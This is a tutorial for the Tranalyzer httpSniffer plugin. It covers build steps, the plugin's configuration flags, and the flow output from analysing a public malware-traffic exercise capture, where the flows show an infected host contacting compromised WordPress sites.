HTTP: HyperText Transfer Protocol
data carving HTTP layer 7
Introduction
This tutorial discusses the plugin httpSniffer.
Preparation
First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:
t2build -e -y
Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied
Then compile the core (tranalyzer2) and the following plugins:
t2build tranalyzer2 basicFlow tcpStates httpSniffer txtSink
...
BUILD SUCCESSFUL
If you did not create a separate data and results directory yet, please do it now in another bash window, that facilitates your workflow:
mkdir ~/data ~/results
The sample PCAP used in this tutorial can be downloaded here: 2015-05-08-traffic-analysis-exercise.pcap (Source: malware-traffic-analysis.net).
Please save it in your ~/data folder.
Now you are all set for analyzing HTTP traffic!
httpSniffer
Let’s look at the plugin configuration first:
httpSniffer
vi src/httpSniffer.h
As you can see below, you can enable/disable any HTTP field in the protocol to tailor the flow output to your needs. Note, that some fields can be aggregated in the output to avoid multiple entries, which eat your flow space away.
By default everything is enabled.
Any content can be extracted in a file, e.g picture, videos, text, …
by enabling the HTTP_SAVE_ constants. As this function is can produce
extensive amount of files from large pcaps, it is advisable to run the
plugin first without the extract function.
All paths can be changed and reside by default in the /tmp directory.
...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */
#define HTTP_MIME 1 // 1: print mime type in flow file; 0: print # of mime types only
#define HTTP_STAT 1 // 1: print response status code in flow file; 0: print # of status codes only
#define HTTP_MCNT 1 // 1: method counts: GET, POST
#define HTTP_HOST 1 // 1: print hosts in flow file; 0: print # of hosts only
#define HTTP_URL 1 // 1: print URL in flow file; 0: print # of URL only
#define HTTP_COOKIE 1 // 1: print cookies in flow file; 0: print # of cookies only
#define HTTP_IMAGE 1 // 1: print image name in flow file; 0: print # of images only
#define HTTP_VIDEO 1 // 1: print video name in flow file; 0: print # of videos only
#define HTTP_AUDIO 1 // 1: print audio name in flow file; 0: print # of audios only
#define HTTP_MSG 1 // 1: print message name in flow file; 0: print # of messages only
#define HTTP_APPL 1 // 1: print application name in flow file; 0: print # of applications only
#define HTTP_TEXT 1 // 1: print text name in flow file; 0: print # of texts only
#define HTTP_PUNK 1 // 1: print POST/unknown and all else name in flow file; 0: print # of POST/unknown/else only
#define HTTP_BODY 1 // 1: content body exam, print anomaly bits in flow file; 0: none
#define HTTP_BDURL 1 // 1: print body url name in flow file; 0: none
#define HTTP_USRAG 1 // 1: print User-Agents in flow file; 0: none
#define HTTP_XFRWD 1 // 1: print X-Forward-For in flow file; 0: none
#define HTTP_REFRR 1 // 1: print Referer in flow file; 0: none
#define HTTP_VIA 1 // 1: print Via in flow file; 0: none
#define HTTP_LOC 1 // 1: print Location in flow file; 0: none
#define HTTP_SERV 1 // 1: print Server in flow file; 0: none
#define HTTP_PWR 1 // 1: print X-Powered-By in flow file; 0: none
#define HTTP_STATAGA 1 // 1: aggregate stat response in flow file; 0: dont
#define HTTP_MIMEAGA 1 // 1: aggregate mime response in flow file; 0: dont
#define HTTP_HOSTAGA 1 // 1: aggregate Host in flow file; 0: dont
#define HTTP_URLAGA 1 // 1: aggregate URL in flow file; 0: dont
#define HTTP_USRAGA 1 // 1: aggregate User-Agents in flow file; 0: dont
#define HTTP_XFRWDA 1 // 1: aggregate X-Forwarded-For in flow file; 0: dont
#define HTTP_REFRRA 1 // 1: aggregate Referer in flow file; 0: dont
#define HTTP_VIAA 1 // 1: aggregate Via in flow file; 0: dont
#define HTTP_LOCA 1 // 1: aggregate Location in flow file; 0: dont
#define HTTP_SERVA 1 // 1: aggregate Server in flow file; 0: dont
#define HTTP_PWRA 1 // 1: aggregate X-Powered-By in flow file; 0: dont
//#define HTTP_ENT 0 // entropy calculation, not implemented yet
// data carving modes
#define HTTP_SAVE_IMAGE 0 // 1: Save images in files under HTTP_IMAGE_PATH; 0: Don't save images
#define HTTP_SAVE_VIDEO 0 // 1: Save videos in files under HTTP_VIDEO_PATH; 0: Don't save videos
#define HTTP_SAVE_AUDIO 0 // 1: Save audios in files under HTTP_TEXT_PATH; 0: Don't save audios
#define HTTP_SAVE_MSG 0 // 1: Save messages in files under HTTP_MSG_PATH; 0: Don't save pdfs
#define HTTP_SAVE_TEXT 0 // 1: Save texts in files under HTTP_TEXT_PATH; 0: Don't save text
#define HTTP_SAVE_APPL 0 // 1: Save applications in files under HTTP_TEXT_PATH; 0: Don't save applications
#define HTTP_SAVE_PUNK 0 // 1: Save PUT/else content in files under HTTP_PUNK_PATH; 0: Don't save PUT content
#define HTTP_DATA_C_MAX 40 // Maximum dimension of storage arrays per flow
#define HTTP_MXFILE_LEN 80 // Maximum storage name length
#define HTTP_MXUA_LEN 400 // User-Agent length
#define HTTP_MXXF_LEN 80 // X-Forwarded-For length
//#define HTTP_MXCK_LEN 150 // maximum cookie
//#define HTTP_MAXPBIN (1 << 8)
/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */
#define HTTP_RMDIR 1 // empty HTTP_*_PATH before starting (require at least one of HTTP_SAVE*=1)
// User defined storage boundary conditions
#define HTTP_PATH "/tmp" // Root path for extracted files
#define HTTP_IMAGE_PATH "httpPicture" // Path for pictures
#define HTTP_VIDEO_PATH "httpVideo" // Path for videos
#define HTTP_AUDIO_PATH "httpAudio" // Path for audios
#define HTTP_MSG_PATH "httpMSG" // Path for messages
#define HTTP_TEXT_PATH "httpText" // Path for texts
#define HTTP_APPL_PATH "httpAppl" // Path for applications
#define HTTP_PUNK_PATH "httpPunk" // Path for POST / else / unknown content
#define HTTP_NONAME "nudel" // name of files without name
/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...now, run t2 on the supplied pcap.
================================================================================ Tranalyzer 0.9.1 (Anteater), Cobra. PID: 28406, Prio: 0, SID: 666 ================================================================================ [INF] Creating flows for L2, IPv4, IPv6 Active plugins: 01: basicFlow, 0.9.1 02: tcpStates, 0.9.1 03: httpSniffer, 0.9.1 04: txtSink, 0.9.1 [INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K) [INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K) Processing file: /home/user/data/2015-05-08-traffic-analysis-exercise.pcap Link layer type: Ethernet [EN10MB/1] Snapshot length: 65535 (65.53 K) Dump start: 1431031896.723375000 sec (Thu 07 May 2015 20:51:36 GMT) Dump stop : 1431032021.842982000 sec (Thu 07 May 2015 20:53:41 GMT) Total dump duration: 125.119607000 sec (2m 5s) Finished processing. Elapsed time: 0.014296888 sec Finished unloading flow memory. Time: 0.014935613 sec Percentage completed: 100.00% Number of processed packets: 761 Number of processed bytes: 495665 (495.67 K) Number of raw bytes: 495665 (495.67 K) Number of pad bytes: 1857 (1.86 K) Number of pcap bytes: 507865 (507.87 K) Number of IPv4 packets: 761 [100.00%] Number of A packets: 305 [40.08%] Number of B packets: 456 [59.92%] Number of A bytes: 34638 (34.64 K) [6.99%] Number of B bytes: 461027 (461.03 K) [93.01%] <A packet load>: 113.57 <B packet load>: 1011.02 -------------------------------------------------------------------------------- tcpStates: Aggregated tcpStatesAFlags=0x42 httpSniffer: Aggregated httpStat=0x003c httpSniffer: Aggregated httpAFlags=0x1103 httpSniffer: Aggregated httpCFlags=0x0010 httpSniffer: Aggregated httpHeadMimes=0x0045 httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0 httpSniffer: Number of HTTP packets: 399 [52.43%] httpSniffer: Number of HTTP GET requests: 28 [7.02%] httpSniffer: Number of HTTP POST requests: 9 [2.26%] httpSniffer: HTTP GET/POST ratio: 3.11 -------------------------------------------------------------------------------- Headers count: min: 3, max: 3, avg: 3.00 Number of TCP packets: 745 [97.90%] Number of TCP bytes: 493885 (493.88 K) [99.64%] Number of UDP packets: 16 [2.10%] Number of UDP bytes: 1780 (1.78 K) [0.36%] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Number of processed flows: 68 Number of processed IPv4 flows: 68 [100.00%] Number of processed A flows: 34 [50.00%] Number of processed B flows: 34 [50.00%] Number of request flows: 34 [50.00%] Number of reply flows: 34 [50.00%] Total A/B flow asymmetry: 0.00 Total req/rply flow asymmetry: 0.00 Number of processed A+B packets/A+B flows: 11.19 Number of processed A packets/A flows: 8.97 Number of processed B packets/ B flows: 13.41 Number of processed total packets/s: 6.08 Number of processed A+B packets/s: 6.08 Number of processed A packets/s: 2.44 Number of processed B packets/s: 3.64 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <Number of processed flows/s>: 0.54 <Bandwidth>: 31574 b/s (31.57 Kb/s) <Raw bandwidth>: 31692 b/s (31.69 Kb/s) Max number of flows in memory: 56 [0.02%] Memory usage: 0.04 GB [0.05%] Aggregated flowStat=0x0400000000004000 [INF] IPv4 flows
So the aggregated httpStat tells us there is HTTP.
The httpStat column with value 0x003c is to be interpreted as follows: bit | httpStat | Description ============================================================================= 2 | 0x0004 | Internal state: pending URL name 3 | 0x0008 | HTTP flow 4 | 0x0010 | Internal state: Chunked transfer 5 | 0x0020 | Internal state: HTTP flow detected The httpAFlags column with value 0x1103 is to be interpreted as follows: bit | httpAFlags | Description ============================================================================= 0 | 0x0001 | POST query with parameters 1 | 0x0002 | Host is IPv4, e.g., Host: 1.2.3.4 8 | 0x0100 | X-Site Scripting protection 12 | 0x1000 | Possible EXE download The httpCFlags column with value 0x0010 is to be interpreted as follows: The httpCFlags column with value 0x0010 is to be interpreted as follows: bit | httpCFlags | Description ============================================================================= 4 | 0x0010 | Potential HTTP content The httpHeadMimes column with value 0x0045 is to be interpreted as follows: bit | httpHeadMimes | Description ============================================================================= 0 | 0x0001 | Application 2 | 0x0004 | Image 6 | 0x0040 | Text
img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
tawk '{ split($httpImg_Vid_Aud_Msg_Txt_App_Unk, A, "_"); if (A[1] || A[5] || A[6]) print }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | tcol
%dir flowInd flowStat timeFirst timeLast duration numHdrDesc numHdrs hdrDesc srcMac dstMac ethType vlanID srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags httpStat httpAFlags httpMethods httpHeadMimes httpCFlags httpGet_Post httpRSCnt httpRSCode httpURL_Via_Loc_Srv_Pwr_UAg_XFr_Ref_Cky_Mim httpImg_Vid_Aud_Msg_Txt_App_Unk httpHosts httpURL httpMimes httpCookies httpImages httpVideos httpAudios httpMsgs httpAppl httpText httpPunk httpBdyURL httpUsrAg httpXFor httpRefrr httpVia httpLoc httpServ httpPwr
B 2 0x0400000000004001 1431031897.090353000 1431031897.467080000 0.376727000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49184 6 0x00 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__285a4d4e4e5a4d4d4649584c5d43064b4745_2_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 7 0x0400000000004001 1431031898.870027000 1431031899.146185000 0.276158000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49188 6 0x00 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_aa25f5fe2875e3d0a244e6969e589cc4_7_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 21 0x0400000000004000 1431031903.508284000 1431031905.661649000 2.153365000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49198 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 21 0x0400000000004001 1431031903.559171000 1431031905.661533000 2.102362000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49198 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_c=cdcnw7cfz43rmtg_21_B_1_0" "Apache" "PHP/5.3.29"
A 23 0x0400000000004000 1431031905.838183000 1431031908.624824000 2.786641000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49200 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 23 0x0400000000004001 1431031905.940902000 1431031908.624779000 2.683877000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49200 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_t=8r1gf1b2t1kuq42_23_B_1_0" "Apache" "PHP/5.3.29"
B 15 0x0400000000004001 1431031902.907008000 1431031903.049134000 0.142126000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 188.165.164.184 fr "OVH-MNT" 80 192.168.138.158 07 "Private network" 49195 6 0x02 0x0078 0x0100 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/plain" "__15_B_1_0" "DYNAMIC+"
A 27 0x0400000000004000 1431031915.188019000 1431031917.179846000 1.991827000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49204 72.34.49.86 us "IHNetworks" 80 6 0x00 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 27 0x0400000000004001 1431031915.292307000 1431031917.179749000 1.887442000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49204 6 0x00 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_u=ka6nnuvccqlw9_27_B_1_0" "Apache" "PHP/5.3.29"
B 6 0x0400000000004001 1431031897.801147000 1431031961.652768000 63.851621000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49186 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__6_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 32 0x0400000000004001 1431031946.186389000 1431031950.230839000 4.044450000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49208 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 2_0_0_0_0_0_0 "image/png" "_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_32_B_1_0";"_img_rb.png_32_B_3_1" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 5 0x0400000000004001 1431031897.787957000 1431031898.067694000 0.279737000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49185 6 0x02 0x0068 0x0000 0x00 0x0001 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_0_1_0 "application/x-shockwave-flash" "__5_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 8 0x0400000000004001 1431031899.272356000 1431031900.101930000 0.829574000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49189 6 0x02 0x0068 0x1000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__b514ee6f0fe486009a6d83b035a4c0bd_8_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 9 0x0400000000004001 1431031901.437910000 1431031901.594209000 0.156299000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49190 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__b2566564b3ba1a38e61c83957a7dbcd5_9_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 31 0x0400000000004001 1431031946.186400000 1431031952.217120000 6.030720000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49207 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_2 2_0_0_0_0_0_0 "image/png";"image/vnd.microsoft.icon" "_img_flags_es.png_31_B_1_0";"_favicon.ico_31_B_2_1" "nginx/1.2.1"
B 10 0x0400000000004001 1431031901.748731000 1431031901.905523000 0.156792000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49191 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__3a08b0be8322c244f5a1cb9c1057d941_10_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 11 0x0400000000004001 1431031902.059710000 1431031902.440796000 0.381086000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49192 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__d71e0bd86db9587158745a986a4b3606_11_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 12 0x0400000000004001 1431031902.592729000 1431031902.752525000 0.159796000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49193 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__34eaf8bd50d85d8c6baacb45f0a7b22e_12_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
B 14 0x0400000000004001 1431031902.893639000 1431031903.051071000 0.157432000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49194 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__60dbe33b908e0086292196ef001816bc_14_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 18 0x0400000000004000 1431031903.090317000 1431031903.288476000 0.198159000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49197 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 18 0x0400000000004001 1431031903.132272000 1431031903.288564000 0.156292000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49197 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_t=cdcnw7cfz43rmtg_18_B_1_0" "Apache"
B 16 0x0400000000004001 1431031903.188176000 1431031903.341751000 0.153575000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il "Not allocated by APNIC" 80 192.168.138.158 07 "Private network" 49196 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "__51424ddd486ff06861fceed24e86b329_16_B_1_0" "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6" "PHP/5.3.3"
A 22 0x0400000000004000 1431031905.650875000 1431031905.834393000 0.183518000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49199 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 22 0x0400000000004001 1431031905.709435000 1431031905.834454000 0.125019000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49199 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_B_1_0" "Apache"
A 24 0x0400000000004000 1431031908.613660000 1431031908.779062000 0.165402000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49201 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 24 0x0400000000004001 1431031908.667116000 1431031908.779106000 0.111990000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49201 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_B_1_0" "Apache"
A 25 0x0400000000004000 1431031908.780729000 1431031912.367847000 3.587118000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49202 72.34.49.86 us "IHNetworks" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk" "application/x-www-form-urlencoded" "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 25 0x0400000000004001 1431031908.886579000 1431031912.367927000 3.481348000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 72.34.49.86 us "IHNetworks" 80 192.168.138.158 07 "Private network" 49202 6 0x02 0x0078 0x0000 0x00 0x0040 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_B_1_0" "Apache" "PHP/5.3.29"
A 26 0x0400000000004000 1431031914.993554000 1431031915.185509000 0.191955000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49203 204.152.254.221 us "Brinkster Communications Corpo" 80 6 0x02 0x006c 0x0001 0x08 0x0001 0x0010 0_1 0 1_0_0_0_0_1_0_0_0_1 0_0_0_0_0_1_0 "runlove.us" "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9" "application/x-www-form-urlencoded" "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_A_1_0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
B 26 0x0400000000004001 1431031915.035444000 1431031915.185568000 0.150124000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 204.152.254.221 us "Brinkster Communications Corpo" 80 192.168.138.158 07 "Private network" 49203 6 0x02 0x0068 0x0000 0x00 0x0040 0x0010 0_0 1 404 0_0_0_1_0_0_0_0_0_1 0_0_0_0_1_0_0 "text/html" "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_B_1_0" "Apache"
